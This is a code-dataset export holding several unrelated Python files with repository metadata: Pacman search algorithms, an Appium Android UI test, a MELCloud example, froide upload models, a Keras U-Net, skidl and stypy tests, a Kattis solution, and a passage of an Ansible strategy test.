| 168,390,049
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,893
|
py
|
# search.py
# ---------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
"""
In search.py, you will implement generic search algorithms which are called by
Pacman agents (in searchAgents.py).
"""
import util
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem.
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state.
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples, (successor,
action, stepCost), where 'successor' is a successor to the current
state, 'action' is the action required to get there, and 'stepCost' is
the incremental cost of expanding to that successor.
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions.
The sequence must be composed of legal moves.
"""
util.raiseNotDefined()
def tinyMazeSearch(problem):
"""
Returns a sequence of moves that solves tinyMaze. For any other maze, the
sequence of moves will be incorrect, so only use this for tinyMaze.
"""
from game import Directions
s = Directions.SOUTH
w = Directions.WEST
return [s, s, w, s, w, w, s, w]
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first.
Your search algorithm needs to return a list of actions that reaches the
goal. Make sure to implement a graph search algorithm.
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print "Start:", problem.getStartState()
print "Is the start a goal?", problem.isGoalState(problem.getStartState())
print "Start's successors:", problem.getSuccessors(problem.getStartState())
"""
"*** YOUR CODE HERE ***"
fringe = util.Stack()
visited = []
path = []
tmpPath = util.Stack() # store path to each successor
currentState = problem.getStartState()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
fringe.push(successor)
tmpPath.push(path + [action])
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
path = tmpPath.pop() #path to currentState from startState
return path
def breadthFirstSearch(problem):
"""Search the shallowest nodes in the search tree first."""
"*** YOUR CODE HERE ***"
fringe = util.Queue()
visited = []
path = []
tmpPath = util.Queue() # store path to each successor
currentState = problem.getStartState()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
fringe.push(successor)
tmpPath.push(path + [action])
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
path = tmpPath.pop() #path to currentState from startState
return path
def uniformCostSearch(problem):
"""Search the node of least total cost first."""
"*** YOUR CODE HERE ***"
fringe = util.PriorityQueue()
visited = []
path = []
tmpPath = util.PriorityQueue() # store path to each successor
fringe.push(problem.getStartState(),0)
currentState = fringe.pop()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
tmpCost = problem.getCostOfActions(path + [action])
fringe.push(successor, tmpCost)
tmpPath.push(path + [action], tmpCost)
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
path = tmpPath.pop() #path to currentState from startState
return path
def nullHeuristic(state, problem=None):
"""
A heuristic function estimates the cost from the current state to the nearest
goal in the provided SearchProblem. This heuristic is trivial.
"""
return 0
def aStarSearch(problem, heuristic=nullHeuristic):
"""Search the node that has the lowest combined cost and heuristic first."""
"*** YOUR CODE HERE ***"
fringe = util.PriorityQueue()
visited = []
path = []
tmpPath = util.PriorityQueue() # store path to each successor
fringe.push(problem.getStartState(),0)
currentState = fringe.pop()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
tmpCost = problem.getCostOfActions(path + [action]) + heuristic(successor, problem) # f(n) = g(n) + h(n)
fringe.push(successor, tmpCost)
tmpPath.push(path + [action], tmpCost)
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
path = tmpPath.pop() # path to currentState from startState
return path
# Abbreviations
bfs = breadthFirstSearch
dfs = depthFirstSearch
astar = aStarSearch
ucs = uniformCostSearch
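# Typical invocations from the Pacman project root (added; assumed from the
# standard Berkeley handout -- layout names and flags are not defined here):
#   python pacman.py -l tinyMaze -p SearchAgent -a fn=tinyMazeSearch
#   python pacman.py -l mediumMaze -p SearchAgent -a fn=bfs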
|
[
"unconfigured@null.spigotmc.org"
] |
unconfigured@null.spigotmc.org
|
0e04795723c5e4257eec9e7bdd971712e6369da2
|
32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd
|
/benchmark/tintbrowser/testcase/firstcases/testcase7_023.py
|
fb1e9d767741ee7ec7143ea90c07655d38f16cfe
|
[] |
no_license
|
Prefest2018/Prefest
|
c374d0441d714fb90fca40226fe2875b41cf37fc
|
ac236987512889e822ea6686c5d2e5b66b295648
|
refs/heads/master
| 2021-12-09T19:36:24.554864
| 2021-12-06T12:46:14
| 2021-12-06T12:46:14
| 173,225,161
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,905
|
py
|
#coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'org.tint',
'appActivity' : 'org.tint.ui.activities.TintBrowserActivity',
'resetKeyboard' : True,
'androidCoverage' : 'org.tint/org.tint.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
return
# testcase023
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/BtnAddTab\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Tap to enter an URL or a search.\")", "new UiSelector().className(\"android.widget.TextView\").instance(1)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/BookmarkRow.Thumbnail\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/MenuButton\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(82)
driver.press_keycode(82)
element = getElememtBack(driver, "new UiSelector().text(\"Decline\")", "new UiSelector().className(\"android.widget.Button\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Full screen\")", "new UiSelector().className(\"android.widget.TextView\").instance(3)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/ExitFullScreen\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("12st://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("12tp://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("test://tests//en.m.wikipedia.org/wiki/Main_Page");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarGoStopReload\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"http://test//test12s//hk.mobi.yahoo.com/\")", "new UiSelector().className(\"android.widget.TextView\").instance(1)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("http://tests//en.m.wikipedia.org/wiki/Main_Page");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("12st://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("test://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("http://tests//en.m.wikipedia.org/wiki/Main_Page");
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"7_023\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'org.tint'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage)
|
[
"prefest2018@gmail.com"
] |
prefest2018@gmail.com
|
66ae5218e083cec68b52061e500c88077eb68ff4
|
0c95806a805e63a65ce524bac9f2c230c08787dc
|
/examples/get_temps.py
|
18a948ce04c96b2251e7cff05c33435f375c1809
|
[
"MIT"
] |
permissive
|
chenchix/melcloud
|
4a8e9684e4f38e63871ec543b6a1fdb22fc7628e
|
64fe66195ca4e0811391f9b52670ff27954043de
|
refs/heads/master
| 2022-08-16T01:34:40.749190
| 2020-05-29T08:27:40
| 2020-05-29T08:52:47
| 267,796,720
| 0
| 0
| null | 2020-05-29T07:40:36
| 2020-05-29T07:40:36
| null |
UTF-8
|
Python
| false
| false
| 957
|
py
|
# coding=utf-8
from melcloud import MELCloud
from melcloud.constants import Languages
__author__ = "Gareth Coles"
platform = MELCloud(Languages.EN)
platform.login("<EMAIL ADDRESS>", "<PASSWORD>")
if platform.logged_in:
print(f"Logged in as {platform.account.name}")
platform.load_devices()
for building in platform.buildings:
print(f"Building: {building.id} ({building.name})")
for floor in building.floors:
print(f"> Floor: {floor.id} ({floor.name})")
for device in floor.devices:
print(f">> Device: {device.device_id} ({device.device_name})")
print(f" Zone 1: Currently: {device.room_temperature_zone_1}, Target: {device.set_temperature_zone_1}")
print(f" Zone 2: Currently: {device.room_temperature_zone_2}, Target: {device.set_temperature_zone_2}")
print(f" Current weather: {device.weather_observations[0].condition_name}")
|
[
"gdude2002@gmail.com"
] |
gdude2002@gmail.com
|
9df24ae01ad33110298fab7d26828948da2c375d
|
65148257eabf62c5a60c5a2723792c3549887f49
|
/froide/upload/models.py
|
9ff7dd6fd021ba5cbe44e90f0ae71f86445b1fb8
|
[
"MIT"
] |
permissive
|
infoaed/froide
|
083ba5d501f10c29f6f75bc7ae656ebee98fc08c
|
532b626e62f6ad3d5017261d305721d00c16cd43
|
refs/heads/master
| 2021-02-11T17:20:02.449999
| 2020-03-02T17:01:19
| 2020-03-02T17:01:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,279
|
py
|
import json
import os
import tempfile
import uuid
from django.db import models
from django.urls import resolve, Resolver404
from django.contrib.auth import get_user_model
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from django.core.files import File
from django_fsm import FSMField, transition
from .utils import write_bytes_to_file
class states:
INITIAL = 'initial'
RECEIVING = 'receiving'
SAVING = 'saving'
DONE = 'done'
class TusFile(File):
"""
A TUS uploaded file, allow direct move
"""
def temporary_file_path(self):
"""Return the full path of this file."""
return self.file.name
class AbstractUpload(models.Model):
"""
Abstract model for managing TUS uploads
"""
guid = models.UUIDField(_('GUID'), default=uuid.uuid4, unique=True)
state = FSMField(default=states.INITIAL)
upload_offset = models.BigIntegerField(default=0)
upload_length = models.BigIntegerField(default=-1)
upload_metadata = models.TextField(blank=True)
filename = models.CharField(max_length=255, blank=True)
temporary_file_path = models.CharField(max_length=4096, null=True)
expires = models.DateTimeField(null=True, blank=True)
class Meta:
abstract = True
def get_metadata(self):
return json.loads(self.upload_metadata)
def clean_fields(self, exclude=None):
super().clean_fields(exclude=exclude)
if self.upload_offset < 0:
raise ValidationError(_('upload_offset should be >= 0.'))
def write_data(self, upload_bytes, chunk_size):
num_bytes_written = write_bytes_to_file(
self.temporary_file_path,
self.upload_offset,
upload_bytes,
makedirs=True
)
if num_bytes_written > 0:
self.upload_offset += num_bytes_written
self.save()
@property
def size(self):
return self.upload_offset
@property
def content_type(self):
return self.get_metadata().get('filetype')
@property
def name(self):
return self.filename
def delete(self, *args, **kwargs):
if self.temporary_file_exists():
os.remove(self.temporary_file_path)
super().delete(*args, **kwargs)
def get_file(self):
if not self.is_complete():
return None
if self.temporary_file_exists():
return TusFile(open(self.temporary_file_path, 'rb'))
return None
def generate_filename(self):
return os.path.join('{}.bin'.format(uuid.uuid4()))
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
if not self.filename:
self.filename = self.generate_filename()
return super().save(
force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields)
def is_complete(self):
return self.upload_offset == self.upload_length
def temporary_file_exists(self):
return self.temporary_file_path and os.path.isfile(self.temporary_file_path)
def get_or_create_temporary_file(self):
if not self.temporary_file_path:
fd, path = tempfile.mkstemp(prefix="tus-upload-")
os.close(fd)
self.temporary_file_path = path
self.save()
assert os.path.isfile(self.temporary_file_path)
return self.temporary_file_path
@transition(field=state, source=states.INITIAL, target=states.RECEIVING, conditions=[temporary_file_exists])
def start_receiving(self):
"""
State transition to indicate the first file chunk has been received successfully
"""
# Trigger signal
# signals.receiving.send(sender=self.__class__, instance=self)
def ensure_saving(self):
if self.state == states.RECEIVING:
self.start_saving()
@transition(field=state, source=states.RECEIVING, target=states.SAVING, conditions=[is_complete])
def start_saving(self):
"""
State transition to indicate that the upload is complete, and that the temporary file will be transferred to
its final destination.
"""
# Trigger signal
# signals.saving.send(sender=self.__class__, instance=self)
@transition(field=state, source=states.SAVING, target=states.DONE)
def finish(self):
"""
State transition to indicate the upload is ready and the file is ready for access
"""
# Trigger signal
class UploadManager(models.Manager):
def get_by_url(self, upload_url, user=None, token=None):
try:
match = resolve(upload_url)
except Resolver404:
return None
guid = match.kwargs.get('guid')
if guid is None:
return None
try:
return Upload.objects.get(
user=user, token=token, guid=guid
)
except Upload.DoesNotExist:
return None
class Upload(AbstractUpload):
user = models.ForeignKey(
get_user_model(), blank=True, null=True,
on_delete=models.CASCADE
)
token = models.UUIDField(null=True, blank=True)
objects = UploadManager()
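# Lifecycle sketch (added; `upload` is a hypothetical Upload instance,
# summarising the FSM transitions defined above):
#     upload.get_or_create_temporary_file()
#     upload.start_receiving()        # initial -> receiving
#     upload.write_data(chunk, size)  # repeat until offset == length
#     upload.ensure_saving()          # receiving -> saving, once complete
#     upload.finish()                 # saving -> done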
|
[
"mail@stefanwehrmeyer.com"
] |
mail@stefanwehrmeyer.com
|
ac1630018ac308daa7325e487f00b2acbe3b7d63
|
1271ef78335bc7b3af9fd0d7e988edc3c3ff6edf
|
/python/models/sampling_model.py
|
48c383d7637ce57ce95cecd01ee047b1d4f512cd
|
[] |
no_license
|
BB8-2020/FARM-deforestation
|
97b60699ae4468e3a53b5b970b395b2137047915
|
5b9df46ed6ff125f5697d6753a301bbf9538e555
|
refs/heads/main
| 2023-06-08T21:01:55.212018
| 2021-06-25T14:56:58
| 2021-06-25T14:56:58
| 351,037,514
| 0
| 0
| null | 2021-06-25T14:56:59
| 2021-03-24T10:28:56
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,708
|
py
|
"""File to host a modified unet implementation with emphasises on a additional up/downsampling layer."""
from keras import Input, Model
from keras import layers as keras_layers
def get_sampling_model(img_size: tuple = (512, 512), num_classes: int = 2) -> Model:
"""Create and return a UNET model.
Parameters
----------
img_size
The image size in pixel dimensions.
num_classes
The number of classes to classify.
Returns
-------
model
The created UNET model.
"""
inputs = Input(shape=img_size + (3,))
#: [First half of the network: downsampling inputs].
x = keras_layers.Conv2D(32, 3, strides=2, padding="same")(inputs)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.Activation("relu")(x)
#: Set aside residual.
previous_block_activation = x
#: Blocks 1, 2, 3, 4 are identical apart from the feature depth.
for filters in [64, 128, 256, 512]:
x = keras_layers.Activation("relu")(x)
x = keras_layers.SeparableConv2D(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.Activation("relu")(x)
x = keras_layers.SeparableConv2D(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.MaxPooling2D(3, strides=2, padding="same")(x)
#: Project residual.
residual = keras_layers.Conv2D(filters, 1, strides=2, padding="same")(
previous_block_activation
)
#: Add back residual.
x = keras_layers.add([x, residual])
#: Set aside next residual.
previous_block_activation = x
#: [Second half of the network: upsampling inputs].
for filters in [512, 256, 128, 64, 32]:
x = keras_layers.Activation("relu")(x)
x = keras_layers.Conv2DTranspose(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.Activation("relu")(x)
x = keras_layers.Conv2DTranspose(filters, 3, padding="same")(x)
x = keras_layers.BatchNormalization()(x)
x = keras_layers.UpSampling2D(2)(x)
#: Project residual.
residual = keras_layers.UpSampling2D(2)(previous_block_activation)
residual = keras_layers.Conv2D(filters, 1, padding="same")(residual)
#: Add back residual.
x = keras_layers.add([x, residual])
#: Set aside next residual.
previous_block_activation = x
#: Add a per-pixel classification layer.
outputs = keras_layers.Conv2D(num_classes, 3, activation="softmax", padding="same")(
x
)
#: Define the model.
model = Model(inputs, outputs)
return model
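# Usage sketch (added; assumes a TensorFlow-backed Keras installation):
#     model = get_sampling_model(img_size=(512, 512), num_classes=2)
#     model.summary()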
|
[
"abou.w@hotmail.com"
] |
abou.w@hotmail.com
|
d91641c566c3d076846c9b064aa4cad9824e56fe
|
243515329480040575331d2336152f4023fbc475
|
/tests/test_interface.py
|
c7beecd72246899831b41544150867edc8d9ab96
|
[
"MIT"
] |
permissive
|
Ariyatina/skidl
|
439eec7a6ae36a58fc052d8b827f88c89756cc13
|
5aace5c463403b29604a1dc2c32f4da8c86796d3
|
refs/heads/master
| 2023-07-18T09:23:24.173653
| 2021-07-21T13:54:39
| 2021-07-21T13:54:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,764
|
py
|
import pytest
from skidl import *
from .setup_teardown import *
def test_interface_1():
"""Test interface."""
@subcircuit
def resdiv(gnd, vin, vout):
res = Part("Device", "R", dest=TEMPLATE)
r1 = res(value="1k")
r2 = res(value="500")
cap = Part("Device", "C", dest=TEMPLATE)
c1 = cap()
c2 = cap(value="1uF")
bus1 = Bus("BB", 10)
vin += r1[1], c1[1] # Connect the input to the first resistor.
gnd += r2[2], c2[2] # Connect the second resistor to ground.
vout += (
r1[2],
c1[2],
r2[1],
c2[1],
) # Output comes from the connection of the two resistors.
intfc = Interface(gnd=Net("GND"), vin=Net("VI"), vout=Net("VO"),)
intfc.gnd.aliases += "GND"
intfc.gnd.aliases += "GNDA"
resdiv(**intfc)
resdiv(**intfc)
assert len(default_circuit.parts) == 8
assert len(default_circuit.get_nets()) == 3
assert len(default_circuit.buses) == 2
assert len(Net.fetch("GND")) == 4
assert len(Net.fetch("VI")) == 4
assert len(Net.fetch("VO")) == 8
assert len(intfc.gnd) == 4
assert len(intfc.vin) == 4
assert len(intfc.vout) == 8
assert len(intfc["gnd"]) == 4
assert len(intfc["vin"]) == 4
assert len(intfc["vout"]) == 8
intfc.gnd += Pin()
intfc["vin"] += Pin()
assert len(Net.fetch("GND")) == 5
assert len(Net.fetch("VI")) == 5
assert len(Net.fetch("VO")) == 8
assert len(intfc.gnd) == 5
assert len(intfc.vin) == 5
assert len(intfc.vout) == 8
assert len(intfc["gnd"]) == 5
assert len(intfc["vin"]) == 5
assert len(intfc["vout"]) == 8
assert len(intfc["GND"]) == 5
assert len(intfc["GNDA"]) == 5
|
[
"devb@xess.com"
] |
devb@xess.com
|
b3d298466335c9f5ca3764f658192afc3d03c556
|
eb3683f9127befb9ef96d8eb801206cf7b84d6a7
|
/stypy/sgmc/sgmc_cache/taxonomy/builtin_functions/slice/error_slice_parameters.py
|
6c7b78a0cf9f6ccf806fb2b85a199b8498b304a2
|
[] |
no_license
|
ComputationalReflection/stypy
|
61ec27333a12f76ac055d13f8969d3e0de172f88
|
be66ae846c82ac40ba7b48f9880d6e3990681a5b
|
refs/heads/master
| 2021-05-13T18:24:29.005894
| 2018-06-14T15:42:50
| 2018-06-14T15:42:50
| 116,855,812
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,607
|
py
|
# -*- coding: utf-8 -*-
"""
ORIGINAL PROGRAM SOURCE CODE:
1: # coding=utf-8
2: __doc__ = "slice method is present, but is invoked with a wrong number of parameters"
3:
4: if __name__ == '__main__':
5: # Call options
6: # (AnyType) -> <type 'slice'>
7: # (AnyType, AnyType) -> <type 'slice'>
8: # (AnyType, AnyType, AnyType) -> <type 'slice'>
9:
10:
11: # Call the builtin with incorrect number of parameters
12: # Type error
13: ret = slice(3, 4, 5, 6)
14:
"""
# Import the stypy library necessary elements
from stypy.type_inference_programs.type_inference_programs_imports import *
# Create the module type store
module_type_store = Context(None, __file__)
# ################# Begin of the type inference program ##################
# Assigning a Str to a Name (line 2):
str_1 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 2, 10), 'str', 'slice method is present, but is invoked with a wrong number of parameters')
# Assigning a type to the variable '__doc__' (line 2)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 2, 0), '__doc__', str_1)
if (__name__ == '__main__'):
# Assigning a Call to a Name (line 13):
# Call to slice(...): (line 13)
# Processing the call arguments (line 13)
int_3 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 16), 'int')
int_4 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 19), 'int')
int_5 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 22), 'int')
int_6 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 13, 25), 'int')
# Processing the call keyword arguments (line 13)
kwargs_7 = {}
# Getting the type of 'slice' (line 13)
slice_2 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 13, 10), 'slice', False)
# Calling slice(args, kwargs) (line 13)
slice_call_result_8 = invoke(stypy.reporting.localization.Localization(__file__, 13, 10), slice_2, *[int_3, int_4, int_5, int_6], **kwargs_7)
# Assigning a type to the variable 'ret' (line 13)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 13, 4), 'ret', slice_call_result_8)
# ################# End of the type inference program ##################
module_errors = stypy.errors.type_error.StypyTypeError.get_error_msgs()
module_warnings = stypy.errors.type_warning.TypeWarning.get_warning_msgs()
|
[
"redondojose@uniovi.es"
] |
redondojose@uniovi.es
|
63f5c6f169809e05a1c1c88bec3d9875c56284bd
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_thudded.py
|
a00c7db9bd98c96d51333c65808b2fee71f3d38a
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 218
|
py
|
# class header
class _THUDDED():
def __init__(self):
self.name = "THUDDED"
self.definitions = 'thud'  # quoted; the original bare name would raise NameError
self.parents = []
self.children = []  # fixed typo: was `childen`
self.properties = []
self.jsondata = {}
self.basic = ['thud']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
5d6b71efebb6a271a66b3250e0e7046636ba5f4d
|
32f5bc330388a96877d93fdd7b21599a40735400
|
/Python/bitbybit.py
|
4d3828f05ee797f54e45115008e3d6f1e9edac58
|
[] |
no_license
|
alexlwn123/kattis
|
670180d86f0863328a16e12ed937c2fefb3226a2
|
c1163bae3fdaf95c1087b216c48e7e19059d3d38
|
refs/heads/master
| 2021-06-21T16:26:15.642449
| 2020-12-24T20:59:10
| 2020-12-24T20:59:10
| 152,286,208
| 1
| 1
| null | 2018-10-14T22:40:09
| 2018-10-09T16:40:48
|
Java
|
UTF-8
|
Python
| false
| false
| 891
|
py
|
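# (Added note) Kattis "Bit by Bit": simulates a 32-bit register with
# three-valued logic; each bit is 1, 0, or -1 for "unknown" (printed as '?').
# SET/CLEAR force a bit, AND/OR combine bit j into bit i, and the register
# is printed most-significant bit first after each block of n commands.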
def main():
n = int(input())
while n:
bits = [-1 for i in range(32)]
for i in range(n):
line = input().split()
if line[0] == 'SET':
bits[int(line[1])] = 1
elif line[0] == 'CLEAR':
bits[int(line[1])] = 0
elif line[0] == 'AND':
i, j = int(line[1]), int(line[2])
if bits[i] == 0 or bits[j] == 0:
bits[i] = 0
elif bits[i] == 1 and bits[j] == 1:
bits[i] = 1
else:
bits[i] = -1
elif line[0] == 'OR':
i, j = int(line[1]), int(line[2])
if bits[i] == 1 or bits[j] == 1:
bits[i] = 1
elif bits[i] == -1 or bits[j] == -1:
bits[i] = -1
n = int(input())
for i in range(32):
if bits[i] == -1:
bits[i] = "?"
else:
bits[i] = str(bits[i])
print("".join(bits[::-1]))
if __name__ == '__main__':
main()
|
[
"asl0028@auburn.edu"
] |
asl0028@auburn.edu
|
736d6c3a30b3f19c88dbb1dfae335929360d9d92
|
27e890f900bd4bfb2e66f4eab85bc381cf4d5d3f
|
/tests/unit/plugins/strategy/test_strategy_linear.py
|
4c854f532cb71f360af50c823f22c8a95ec4c5f8
|
[] |
no_license
|
coll-test/notstdlib.moveitallout
|
eb33a560070bbded5032385d0aea2f3cf60e690b
|
0987f099b783c6cf977db9233e1c3d9efcbcb3c7
|
refs/heads/master
| 2020-12-19T22:28:33.369557
| 2020-01-23T18:51:26
| 2020-01-23T18:51:26
| 235,865,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,853
|
py
|
# Copyright (c) 2018 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.notstdlib.moveitallout.tests.unit.compat import unittest
from ansible_collections.notstdlib.moveitallout.tests.unit.compat.mock import patch, MagicMock
from ansible.executor.play_iterator import PlayIterator
from ansible.playbook import Playbook
from ansible.playbook.play_context import PlayContext
from ansible_collections.notstdlib.moveitallout.plugins.strategy.linear import StrategyModule
from ansible.executor.task_queue_manager import TaskQueueManager
from ansible_collections.notstdlib.moveitallout.tests.unit.mock.loader import DictDataLoader
from ansible_collections.notstdlib.moveitallout.tests.unit.mock.path import mock_unfrackpath_noop
class TestStrategyLinear(unittest.TestCase):
@patch('ansible.playbook.role.definition.unfrackpath', mock_unfrackpath_noop)
def test_noop(self):
fake_loader = DictDataLoader({
"test_play.yml": """
- hosts: all
gather_facts: no
tasks:
- block:
- block:
- name: task1
debug: msg='task1'
failed_when: inventory_hostname == 'host01'
- name: task2
debug: msg='task2'
rescue:
- name: rescue1
debug: msg='rescue1'
- name: rescue2
debug: msg='rescue2'
""",
})
mock_var_manager = MagicMock()
mock_var_manager._fact_cache = dict()
mock_var_manager.get_vars.return_value = dict()
p = Playbook.load('test_play.yml', loader=fake_loader, variable_manager=mock_var_manager)
inventory = MagicMock()
inventory.hosts = {}
hosts = []
for i in range(0, 2):
host = MagicMock()
host.name = host.get_name.return_value = 'host%02d' % i
hosts.append(host)
inventory.hosts[host.name] = host
inventory.get_hosts.return_value = hosts
inventory.filter_hosts.return_value = hosts
mock_var_manager._fact_cache['host00'] = dict()
play_context = PlayContext(play=p._entries[0])
itr = PlayIterator(
inventory=inventory,
play=p._entries[0],
play_context=play_context,
variable_manager=mock_var_manager,
all_vars=dict(),
)
tqm = TaskQueueManager(
inventory=inventory,
variable_manager=mock_var_manager,
loader=fake_loader,
passwords=None,
forks=5,
)
tqm._initialize_processes(3)
